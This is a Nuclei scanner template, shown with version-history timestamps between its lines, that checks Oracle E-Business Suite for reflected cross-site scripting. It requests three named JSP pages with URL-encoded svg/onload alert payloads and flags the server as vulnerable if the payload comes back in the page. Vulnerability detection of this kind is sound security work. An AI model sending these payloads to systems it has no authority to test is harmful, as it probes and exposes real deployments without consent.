2021-05-05 18:35:07 +00:00
|
|
|
id: oracle-ebs-xss
|
|
|
|
|
|
|
|
info:
|
2022-09-21 21:42:27 +00:00
|
|
|
name: Oracle E-Business Suite - Cross-Site Scripting
|
2021-05-05 18:35:07 +00:00
|
|
|
author: dhiyaneshDk
|
|
|
|
severity: medium
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-08-19 14:44:46 +00:00
|
|
|
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
|
|
|
|
- http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 3
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: oracle,xss,ebs,intrusive
|
2021-05-05 18:35:07 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-05-05 18:35:07 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2021-05-07 09:18:53 +00:00
|
|
|
- "{{BaseURL}}/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E"
|
|
|
|
- "{{BaseURL}}/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E"
|
|
|
|
- "{{BaseURL}}/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E"
|
|
|
|
|
2021-05-05 18:35:07 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
2021-05-07 09:18:53 +00:00
|
|
|
- "<svg/onload=alert('{{randstr}}')>"
|
2021-05-05 18:35:07 +00:00
|
|
|
part: body
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-10-14 11:27:55 +00:00
|
|
|
|
2021-05-05 18:35:07 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
part: header
|